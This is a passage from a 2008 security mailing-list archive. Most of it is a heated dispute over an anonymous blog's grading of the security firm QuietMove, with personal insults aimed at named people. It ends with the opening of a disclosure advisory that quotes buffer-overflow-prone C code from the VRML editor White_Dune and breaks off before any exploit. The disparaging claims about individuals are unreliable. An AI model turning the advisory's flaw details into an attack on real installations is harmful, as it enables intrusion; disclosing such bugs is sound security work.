>> people was Andre Gironda who had a lot of great things to say abou 
>> t QuietMove, but also made the unfortunate mistake of tainting his 
>>  credibility as a professional by directly attacking other vendors.
>>
>> Andre Gironda asked us who we are in one of his emails. He also  
>> indirectly accused us of exacting vengeance on QuietMove by  
>> performing a review. While we?ve never been accused of this before 
>>  by any of our other review subjects, we feel that we should state 
>>  for the record that this is not some sort of vengeance play.
>>
>> Andre Gironda also said that he can vouch for Adam?s 14 years of e 
>> xperience ?and then some?. Apparently when Andre met Adam of  
>> QuietMove, Adam was working as a Unix Security Administrator for U 
>> nphamiliar. Territories (UPT), ?a vulnerability research BBS that  
>> ran from 1989 ? 1996. Also according to Andre Gironda ?. It was  
>> a prominent place for information about vulnerability research. Ma 
>> ny held it in higher regard than Phrack magazine or any leading we 
>> bsite/magazine during that time period.?
>>
>> Sorry Andre, but we don?t agree with your statement about UPT. Eve 
>> n more importantly, we?re not sure how Adam?s experience as a  
>> Unix Security administrator (aka systems admin) will help him offe 
>> r professional IT Security Services. Adam needs to be able to prot 
>> ect his clients from real world hackers, not from failed tape back 
>> ups and disk crashes.
>>
>> Andre went on to say that many ?small businesses such as QuietMove 
>>  have a hard enough time staying alive in this industry.? He said  
>> ?I suggest you pick on someone your
>> own size even if you have a legitimate problem with QuietMove or  
>> Adam.? Our response is that we have no problem with Adam or QuietM 
>> ove. We found QuietMove by doing a google search for Penetration T 
>> esting.
>>
>> In a Different email Andre lost all credibility with us because he  
>> decided to directly attack other companies that we?ve reviewed tha 
>> t received higher grades. If you compare the score cards between Q 
>> uietMove and the other company that Andre bashes, you?ll see why t 
>> hey got the good grade. Anyway, here?s what Andre had to say  
>> (we?ll comment later):
>>
>> ?Look, you rated Denim Group as A-. You must either work there - or
>> know the guys. Dan Cornell is a moron compared to Adam Muntner - and
>> his code is certainly worse (e.g. Sprajax).
>>
>> Adam and team know Burp Suite, use manual web application testing -  
>> in
>> addition to traditional dynamic and static analysis.
>>
>> I have seen Adam and crew using Fortify Software's SCA and Tracer
>> tools. I have seen them using Hailstorm ARC and modifying the
>> Javascript included in the SmartAttack library. I would call this a
>> best-of-breed security testing methodology.
>>
>> I have worked for many small companies myself who do not use ANY
>> automated testing, including both open-source and commercial tools. I
>> think this is stupid... and spent most of my time writing `for' loops
>> in shell just to get around their limitation on "not writing scripts
>> to automate things".
>>
>> I have also worked for small companies that "only" use scripting
>> languages, or only use "the best" scripting language (usually Ruby,
>> Python, or Perl) and write all their own automated tools. This is
>> also stupid -- especially when existing toolsets have lots of great
>> capability -- it's like re-inventing the wheel.
>>
>> Of course there are places that "only use" commercial automated  
>> tools,
>> but I haven't actually met one yet. When I do -- I'll go ahead and
>> post an obnoxious review about them. More people will read mine than
>> anything you do -- and with my name on it -- they are certainly bound
>> to take it a lot more seriously.?
>>
>> Andre lost all credibility with our team when he insulted the Denim  
>> Group. We contacted the Denim Group and spoke directly with one of  
>> their founders when we did their review. Not only were we very  
>> impressed with them, but they provided us with great detail about  
>> their testing methodologies and service capabilities. Adam, Andre  
>> and the rest of the QuietMove team haven?t provided us with anythi 
>> ng tangible yet, and we?ve asked. When we tried to contact them th 
>> e first time we couldn?t get hold of them, same for the second.
>>
>> We?re still waiting to hear back from Adam at QuietMove with answe 
>> rs to our questions about the QuietMove services. If we hear back, 
>>  we?ll modify this blog entry yet again to properly reflect what w 
>> e feel is the truth. We?d also like to make the professional sugge 
>> stion that QuietMove think about their professional image before t 
>> hey respond to anyone in public forum. Not only does their reactio 
>> n not look good but it could make prospective customers turn away.
>>
>> Lastly, with respect to our comment about Marcin Wielgoszewski, a  
>> QuietMove consultant being ?Green?, he confirmed that for us in  
>> an email. He wrote ?You're right. I'm new and young and I'll be th 
>> e first to admit it. We can't all be born security gurus, and I'm  
>> not trying to hide that, but me aside... what have you done beside 
>> s hide behind your gmail account
>> and troll FD? Thanks for pointing out those two pages, two pages  
>> out of 100's that
>> were posted a long time ago and yes, are very out of date.?
>>
>> All in all it is our professional opinion is still that QuietMove  
>> doesn?t have significant ?strong? human talent behind their  
>> services. They appear to be a very small company run by someone th 
>> at is not a ?hacker? by nature but instead is a systems  
>> administrator or your advanced IT guy with a good understanding of 
>>  Web Application Security. If you are looking to truly defend your 
>> selves against malicious hackers then we suggest finding a differe 
>> nt provider.
>>
>> Note: If we receive any information back from QuietMove, other than  
>> what we?ve received in emotional reactions, then we?ll consider  
>> adding that information to this review. If QuietMove can provide u 
>> s with proof of capability then we will accurately reflect that ca 
>> pability here. We?re not in the business of bashing anyone even if 
>>  they bash us or disrespect us. We are in the business of exposing 
>>  Professional IT Security Service providers for what they really a 
>> re to the best of our ability.
>>
>> If you feel that QuietMove deserves a better grade and can provide  
>> us with legitimate reasons as to why, then please comment and we?l 
>> l consider it. (Even after all of their insults.)
>>
>> Score Card (Click to Enlarge)
>>
>>
>>
>> --
>> Posted By secreview to Professional IT Security Providers - Exposed  
>> at 1/01/2008 10:38:00 PM
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/27d7c138/attachment.html 

From slash.pd at gmail.com  Wed Jan  2 15:08:56 2008
From: slash.pd at gmail.com (Peter Dawson)
Date: Wed, 2 Jan 2008 10:08:56 -0500
Subject: [Full-disclosure] Fwd:  Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
	<616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>
	<8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
Message-ID: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>

Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link
you could share ?
tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner < adam.muntner at quietmove.com> wrote:

>
>
> Dre thx for pointing out the ha.ckers.org posts. More evidence of
> secreview selective quotation and/or ability to 'research'
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/aa0a0133/attachment.html 

From adam.muntner at quietmove.com  Wed Jan  2 15:26:17 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 10:26:17 -0500
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
	<616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>
	<8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
	<8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
Message-ID: <CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>

It was a reply to the larry suto review of web app scanners rsnake  
posted. I commented on his blog post. The review was totally worthless.

Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <slash.pd at gmail.com> wrote:

>
> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there  
> a link you could share ?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner < adam.muntner at quietmove.com>  
> wrote:
>
>
> Dre thx for pointing out the ha.ckers.org posts. More evidence of  
> secreview selective quotation and/or ability to 'research'
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/7f209373/attachment.html 

From mukul.dharwadkar at gmail.com  Wed Jan  2 15:41:42 2008
From: mukul.dharwadkar at gmail.com (Mukul Dharwadkar)
Date: Wed, 2 Jan 2008 09:41:42 -0600
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
	<616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>
	<8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
	<8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
	<CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>
Message-ID: <a7e4fdbc0801020741p5397d984m19dc5cc094c3c064@mail.gmail.com>

With all due respect Adam,

You would not have responded to these posts at all if you thought these
reviews were worthless.


On 1/2/08, Adam Muntner <adam.muntner at quietmove.com> wrote:
>
>  It was a reply to the larry suto review of web app scanners rsnake
> posted. I commented on his blog post. The review was totally worthless.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> Phone: 602-793-5969
> Fax: 866-272-8194
> http://www.quietmove.com
>
>
> Sent from my iPhone
>
> On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <slash.pd at gmail.com> wrote:
>
>
>
>
> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there a link
> you could share ?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner < adam.muntner at quietmove.com> wrote:
>
> >
> >
> >
> > Dre thx for pointing out the ha.ckers.org posts. More evidence of
> > secreview selective quotation and/or ability to 'research'
> >
> >
> >
>
>
>
>
>  _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Smile!!! :) It improves your face value...

Visit me at
http://www.dharwadkar.com
http://www.dharwadkar.org
Sister Site:
http://www.saraswatibhuvan.org
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/755cc414/attachment.html 

From secreview at hushmail.com  Wed Jan  2 18:08:13 2008
From: secreview at hushmail.com (SecReview)
Date: Wed, 02 Jan 2008 13:08:13 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
Message-ID: <20080102180813.C5B5050038@mailserver9.hushmail.com>

Hi Adam, 
   
We've said this before and will say this again, this time to 
everyone. 

We would be more than happy to give your company (QuietMove) a 
"better" review if you'd enable us to do that. So far you haven't 
helped us to effectively review you at all. We tried to call you 
before our initial review, but never got hold of anyone. We also 
sent you an email before writing our second review, and you never 
responded to any of the questions in that email. If you'd like us 
to do a better review then provide us with the information that you 
think we will need to get the job done. 

Our current review is the product of your website, emails that 
you've posted to this and other forums, and your reaction to our 
first review. We haven't been able to find anything related to 
major accomplishments by you or by QuietMove, we haven't seen any 
sample reports, and we haven't received any answers to any 
questions about your methodologies for service execution and 
delivery. We even think that our current review might be too harsh, 
but can't change anything without more information. 

If you want us to change our review, we can do that again and we 
can do it in a non-biased way (regardless of all the rants and 
noise). We need you to tell us about your service delivery 
methodologies, your reporting methodologies, how you define 
specific service offerings, what markets you play in, and if 
possible sanitized sample reports. We won't publish any of that 
information directly, but we would use that to produce your next 
review. 

We want our reviews to accurately and truthfully reflect the 
quality and professionalism of the providers that we study. (In 
fact, if anyone has any suggestions as to how we could better 
"rank" security companies we'd be more than happy to listen and 
consider those suggestions.) 

Hope this helps. This will be our last email about QuietMove unless 
you request a redo of the current review. We will only redo the 
review if you are able to provide us with accurate information to 
help us get it done. We think that you should do it, because we 
think that you can score much better than an F+. (You're clearly 
not an idiot and you do have at least some experience.)

-the end.




Regards, 
      The Secreview Team
      http://secreview.blogspot.com

--
Add warmth and beauty to your home with a new rug.  Click Now.
http://tagline.hushmail.com/fc/Ioyw6h4edu6i9KyFqhMMxsbZ4PNyvCU2wW5JQxc2h8yrTHE4BofBeo/
      Professional IT Security Service Providers - Exposed



From Valdis.Kletnieks at vt.edu  Wed Jan  2 18:39:21 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 13:39:21 -0500
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: Your message of "Tue, 01 Jan 2008 12:33:36 CST."
	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
Message-ID: <22264.1199299161@turing-police.cc.vt.edu>

On Tue, 01 Jan 2008 12:33:36 CST, reepex said:

> Is this list up to date?  It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C?

C is not a prerequisite for understanding operating systems design. It's only
needed if the particular operating system you're working with implements its
internals in C.

What is more important is understanding the *concepts* - things like locking,
and race conditions, and how fine-grained locking you need/want for a
filesystem. Having one big lock is a lot easier, but causes contention - having
a lot of little locks can cause deadlocks, especially in error handlers.  What
does the filesystem code do if (for example) it gets 2/3 of the way through the
rename of a file, and encounters an I/O error while writing out the removal of
the old name of the file?  What are the trade-offs required for an operating
system to support jitter-free multimedia applications (the first thing to learn
is that throughput, latency, and jitter are intertwined, and it's very
difficult to do all 3 well at the same time)?

It's also important to understand that there are approaches other than Windows
and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and
have a lot to tell us about other choices that can be made.  There's still a
lot of VMS running out there in scattered corners as well - and that system had
a lot of concepts that one should understand, at least well enough to know why
"my favorite system didn't do it that way because..." (Hint - consider how and
why SYS$FOO variables worked in VMS, and why they're so hard to get working
correctly under Linux - they're *not* exactly the same as Unix/Linux
environment variables, and as such provide both problems and solutions that
environment variables don't).

Bonus points for knowing that VMS was mostly written in Bliss/32 or some such,
and VM and MVS were a mixture of assembler and (later on) PL/S.  No C knowledge
needed for those critters...

Even when the system *is* written in C, you don't need to be a C guru to
understand what's going on. Maurice Bach's "The Design of the Unix Operating
System" is probably one of the classic texts - but you don't need to know C any
better than "read C code snippet as pseudocode" to follow it.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/be128edb/attachment.bin 

From randy at procyonlabs.com  Wed Jan  2 19:13:48 2008
From: randy at procyonlabs.com (Randal T. Rioux)
Date: Wed, 02 Jan 2008 14:13:48 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
Message-ID: <452214.1315441199301228241.JavaMail.servlet@perfora>

>Valdis.Kletnieks at vt.edu said:

>Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
>such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
>No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original source (wasn't it written on stone tablets?). About 50% is C, with a healthy mix of obsoletes making the difference. How something so elegant could be spawned from such chaos is beyond me.

Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE! <grin>

Randy



From william at lefkovics.net  Wed Jan  2 18:57:35 2008
From: william at lefkovics.net (William Lefkovics)
Date: Wed, 2 Jan 2008 10:57:35 -0800
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>	<616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>	<8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>	<8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
	<CA11B0FF-1F3B-4B54-9101-6EDEA952783C@quietmove.com>
Message-ID: <011b01c84d71$56a2c450$03e84cf0$@net>

Anonymous reviews by people who have not used the services of the company
they are reviewing aren't worth the virtual paper they are written on. (even
the name on the site indicates the goal of companies 'exposed' not
'reviewed'.) I am no security expert and would depend on using an external
company for certain security services.  All I have gained from this
discussion is to completely ignore secreview content in making any
determination of companies to call upon for things like penetration testing.

 

I don't know you from . well. Adam.  Your concern is probably that actual
potential clients may read such content and not realize it is drivel. How
about a blog post or something commenting that 'don't be fooled by company
reviews by people who have never tried our services.'? Just curious.

 

 

 

From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Adam Muntner
Sent: Wednesday, January 02, 2008 7:26 AM
To: Peter Dawson
Cc: Full-Disclosure dis
Subject: Re: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F
---)

 

It was a reply to the larry suto review of web app scanners rsnake posted. I
commented on his blog post. The review was totally worthless.

Adam Muntner

Managing Partner

QuietMove, Inc.

Phone: 602-793-5969

Fax: 866-272-8194

http://www.quietmove.com

 

Sent from my iPhone


On Jan 2, 2008, at 10:08 AM, "Peter Dawson" <slash.pd at gmail.com> wrote:

 

Adam

I don't recall Rsnake or id posting a review on secreview. Is there a link
you could share ?
tia

/pd

 

On Jan 2, 2008 9:45 AM, Adam Muntner <  <mailto:adam.muntner at quietmove.com>
adam.muntner at quietmove.com> wrote:

 

 

Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview
selective quotation and/or ability to 'research'

 

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/b4d51174/attachment.html 

From reepex at gmail.com  Wed Jan  2 19:31:46 2008
From: reepex at gmail.com (reepex)
Date: Wed, 2 Jan 2008 13:31:46 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <2fd9390e0801012202q25c768f6w579df2488d6e2d39@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
	<e9d9d4020801011411y5b14122fnbaaa958fd6fb5c69@mail.gmail.com>
	<2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
	<e9d9d4020801012051k3cd0bc9eu161401214b9be62f@mail.gmail.com>
	<2fd9390e0801012202q25c768f6w579df2488d6e2d39@mail.gmail.com>
Message-ID: <e9d9d4020801021131r3099aec7ve5c098aeadca3b30@mail.gmail.com>

everyone who is not a kiddie knows rsnake is a joke, just like anyone else
involved in his *.ackers group.   If rsnake was to post to places like this
instead of lamer 'hacker'/'security' magazines then he would be ridiculed
off the list like pdp architect was.  Instead I believe rsnake knows hes a
kiddie so he sticks to places with non-technical people and does not involve
himself with people who actually know what they are talking about.

I picked on  Adam Munter mostly because his lame intern decided to spout up
on the list only to end up being a kiddie, and also Adam brought it upon
himself by putting any worth into what secreview says and replying to their
review.


On Jan 2, 2008 12:02 AM, Andre Gironda <andreg at gmail.com> wrote:

> On Jan 1, 2008 9:51 PM, reepex <reepex at gmail.com> wrote:
> > ok so they are nothing alike because ptp/hts actually teach you stuff
> while
> > "UPT" was for jokes... so your post was stupid
>
> The joke's on you since you don't have the context.
>
> > I am not a part of secreview but I realize following email threads is
> very
> > complicated for you.
>
> It's not complicated.  I simply just don't care about who you are as
> it relates to the thread.  You appear to be attacking the
> person/people I'm defending, while at the same time defending the
> secreview post.
>
> > So you list 5 tools they use then mention they modify a javascript
> > library...  So basically they use automated tools and  are former  web
> > developers ... sound pretty hardcore
>
> Javascript is more than just a language for web developers, especially
> when utilized in the Hailstorm SmartAttack library, which isn't a
> Javascript library.  These are completely different concepts.  It
> should also be noted that both Burp Suite and Hailstorm ARC can be
> used in manual and hybrid modes... with step-modes and form-trainers.
> They can modify their traversals and have tons of extra customization
> on top of what other offerings provide... and can customize the
> underlying "data-driven" attacks.
>
> Certainly you've read some of Adam Muntner's comments on, say,
> ha.ckers.org and other places?
>
> Allow me to pick on someone in the industry for a second: RSnake.
>
> RSnake has an advertisement up on his website that asks, "Which web
> application scanner can hack it?" "Check the Oct 15 post for study
> results:"
>
> http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/
>
> Most idiots will only read what RSnake / Larry Suto have written, and
> will completely miss the comments by Adam Muntner.  Adam not only
> eloquently puts down the testing techniques by Larry Suto, but also
> makes mention about proper customization of tools and testing outside
> of the commercial scanners.
>
> Effectively, Adam Muntner is one of the only people that does
> understand this problem that you specifically says that he does not,
> and that the secreview challenge seems to care about most of all other
> points.
>
> Where was reepex, where was secreview when RSnake and Larry Suto
> blundered our industry into submission?  Why pick on a hero like Adam
> Muntner instead?  What are you getting out of it?
>
> Worse - RSnake hasn't been called out on this yet - but he has good
> reason to promote Larry's paper.  In fact, it may even be a monetary
> reason.  In an article for INSECURE Magazine, they interview RSnake
> (page 30):
> http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf
>
> Question; What web application scanners do you use?
>
> RSnake: [...] my favorite tools in my arsenal (including the manual
> ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap,
> NTOSpider (commerical), httprint, Cain, sn00per, Absynthe, Sqlninja, a
> half dozen Firefox plugins like Webdeveloper, JSView, NoScript,
> Greasemonkey etc... and the entire suite of unix utils out there, like
> wget, telnet, ncftp, etc.
>
> Notice the only commercial tool listed in NTOSpider.  Coincidence?
>
> Apparently, too much admiration of a single web application security
> scanning vendor can be a bad thing.  Larry Suto has only ever worked
> with Eric Caso at NTObjectives.
>
> Adam Muntner has been a customer of several CWE-Compatible and
> aspiring companies out there.  He has a balanced view of both the
> commercial tools and the open-source world, as well as building his
> own tools from scratch as the need may be.
>
> > You must be a cissp because you take yourself and the internet very
> > seriously. I am pretty sure no one cares about your opinion either.
>
> Wrong again; as always.
>
> Cheers,
> Andre
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/566ef6a8/attachment.html 

From Valdis.Kletnieks at vt.edu  Wed Jan  2 19:32:30 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 14:32:30 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: Your message of "Wed, 02 Jan 2008 14:13:48 EST."
	<452214.1315441199301228241.JavaMail.servlet@perfora>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
Message-ID: <25233.1199302350@turing-police.cc.vt.edu>

On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:

> OpenVMS is less than 40% Blissful...

Obviously, it's migrated over the years.  Back in the late 80's when it
was at its most prevalent (and before it got 'Open' attached to it - we're
talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
Bliss32..

> Security relevance: UNHACKABLE! <grin>

WANK! (The old-timers will know what that means, and it's not what you newbies
think... ;)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/9cda749a/attachment.bin 

From reepex at gmail.com  Wed Jan  2 19:34:40 2008
From: reepex at gmail.com (reepex)
Date: Wed, 2 Jan 2008 13:34:40 -0600
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <22264.1199299161@turing-police.cc.vt.edu>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<1199206656.15507.12.camel@thinker.ph.cox.net>
	<e9d9d4020801011033h373d64edgf47c96f232e3de92@mail.gmail.com>
	<22264.1199299161@turing-police.cc.vt.edu>
Message-ID: <e9d9d4020801021134n1214ef38mf56de4b2aaeacc10@mail.gmail.com>

if you noticed he was reading tanebaum's book about minix. If you would look
at the book you would see he relies heavily on source code and actually has
the code in the back of the book so that he can refer to it constantly. In
other books i agree you do not have to know C, but for this book, if you do
not know C, you will end up understanding at a very very high level what
message passing is and thats about it.

On Jan 2, 2008 12:39 PM, <Valdis.Kletnieks at vt.edu> wrote:

> On Tue, 01 Jan 2008 12:33:36 CST, reepex said:
>
> > Is this list up to date?  It makes it seem as if you are learning basic
> > linux commands, sed, and basic perl. Also why are you reading operating
> > system design and implementation when you do not know C?
>
> C is not a prerequisite for understanding operating systems design. It's
> only
> needed if the particular operating system you're working with implements
> its
> internals in C.
>
> What is more important is understanding the *concepts* - things like
> locking,
> and race conditions, and how fine-grained locking you need/want for a
> filesystem. Having one big lock is a lot easier, but causes contention -
> having
> a lot of little locks can cause deadlocks, especially in error handlers.
>  What
> does the filesystem code do if (for example) it gets 2/3 of the way
> through the
> rename of a file, and encounters an I/O error while writing out the
> removal of
> the old name of the file?  What are the trade-offs required for an
> operating
> system to support jitter-free multimedia applications (the first thing to
> learn
> is that throughput, latency, and jitter are intertwined, and it's very
> difficult to do all 3 well at the same time)?
>
> It's also important to understand that there are approaches other than
> Windows
> and Unix/Linux - IBM's VM and MVS systems have been around for a long
> time, and
> have a lot to tell us about other choices that can be made.  There's still
> a
> lot of VMS running out there in scattered corners as well - and that
> system had
> a lot of concepts that one should understand, at least well enough to know
> why
> "my favorite system didn't do it that way because..." (Hint - consider how
> and
> why SYS$FOO variables worked in VMS, and why they're so hard to get
> working
> correctly under Linux - they're *not* exactly the same as Unix/Linux
> environment variables, and as such provide both problems and solutions
> that
> environment variables don't).
>
> Bonus points for knowing that VMS was mostly written in Bliss/32 or some
> such,
> and VM and MVS were a mixture of assembler and (later on) PL/S.  No C
> knowledge
> needed for those critters...
>
> Even when the system *is* written in C, you don't need to be a C guru to
> understand what's going on. Maurice Bach's "The Design of the Unix
> Operating
> System" is probably one of the classic texts - but you don't need to know
> C any
> better than "read C code snippet as pseudocode" to follow it.
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/e47a7ef5/attachment.html 

From reepex at gmail.com  Wed Jan  2 19:48:13 2008
From: reepex at gmail.com (reepex)
Date: Wed, 2 Jan 2008 13:48:13 -0600
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <25233.1199302350@turing-police.cc.vt.edu>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
	<25233.1199302350@turing-police.cc.vt.edu>
Message-ID: <e9d9d4020801021148v689e2ca5q35aa49c084fef0f2@mail.gmail.com>

its funny how you always talk about other people ( like a few days ago when
you were amazed that people exploited an off by one ), and talk about "the
old times"... sure signs of someone washed up as evident by your
non-productiveness in the last few years ( and no - spamming mailing lists
does not count )

On Jan 2, 2008 1:32 PM, <Valdis.Kletnieks at vt.edu> wrote:

> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..
>
> > Security relevance: UNHACKABLE! <grin>
>
> WANK! (The old-timers will know what that means, and it's not what you
> newbies
> think... ;)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/b9268c6a/attachment.html 

From aluigi at autistici.org  Wed Jan  2 19:55:33 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Wed, 2 Jan 2008 20:55:33 +0100
Subject: [Full-disclosure] Buffer-overflow and format string in White_Dune
	0.29beta791
Message-ID: <20080102205533.7bcf8834.aluigi@autistici.org>


#######################################################################

                             Luigi Auriemma

Application:  White_Dune
              http://vrml.cip.ica.uni-stuttgart.de/dune/
Versions:     <= 0.29beta791
Platforms:    Unix/Linux/MacOSX and Windows
Bugs:         A] buffer-overflow in Scene::errorf
              B] format string in ImportFile
Exploitation: local
Date:         02 Jan 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


White_Dune is an open source editor/viewer for the VRML97 files.


#######################################################################

=======
2) Bugs
=======

-----------------------------------
A] buffer-overflow in Scene::errorf
-----------------------------------

A buffer-overflow vulnerability is located in the function which builds
the error messages for the problems happened during the parsing of the
WRL file.

>From Scene.cpp:

void
Scene::errorf(const char *fmt, ...)
{
    va_list ap;
    char buf[1024], buf2[1024];
    const char *url = "";  

    va_start(ap, fmt);
    vsprintf(buf, fmt, ap);
    if (TheApp->getImportURL() != NULL)
        url = TheApp->getImportURL();
    mysnprintf(buf2, 1024, "%s %d: %s", url, lineno, buf);
    _compileErrors += buf2;
}


------------------------------
B] format string in ImportFile
------------------------------

